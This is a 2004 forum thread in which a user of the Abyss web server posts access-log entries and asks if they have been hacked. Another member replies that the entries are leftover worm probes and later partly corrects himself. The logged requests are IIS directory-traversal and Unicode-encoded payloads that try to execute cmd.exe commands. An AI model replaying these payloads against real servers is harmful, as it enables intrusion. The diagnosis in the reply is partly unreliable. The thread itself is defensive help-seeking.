View previous topic :: View next topic |
Author |
Message |
Arnyek -
Joined: 07 Jan 2004 Posts: 1
|
Posted: Wed Jan 07, 2004 4:50 am Post subject: I been hacked? |
|
|
Hello Everyone!
I just installed this nice webserver on my system to share some pictures with my friends at overseas.
First day I find it in my log numerouse times from differrent IP addresses :
24.101.196.* - - [06/Jan/2004:21:28:06 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:08 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:14 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:17 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:19 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:20 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:26 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:28 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:30 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:35 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
Should I be worry, or is there anyway I can prevent this kind of attac in the future?
Sorry if I am posting in the wrong group.
I really appreciated if someone can give me advice or send me a link so I can learn about it.
Thanks
Arnyek |
|
Back to top |
|
|
Axis -
Joined: 29 Sep 2003 Posts: 336
|
Posted: Wed Jan 07, 2004 5:34 am Post subject: |
|
|
Hi Arnyek--
No, you have not been hacked. What you are seeing is the footprints of the Code Red or sadmind/IIS virus, which is quite old and mainly geered to an old FrontPage vulnerability. You are on Abyss so you have no problems with this. It is weird there are still machines out there with this (in internet time) ancient virus!
Regards,
Axis |
|
Back to top |
|
|
Anonymoose -
Joined: 09 Sep 2003 Posts: 2192
|
|
Back to top |
|
|
Axis -
Joined: 29 Sep 2003 Posts: 336
|
Posted: Wed Jan 07, 2004 4:34 pm Post subject: |
|
|
Anonymoose--
I stand corrected about IIS.
Regards,
Axis |
|
Back to top |
|
|
|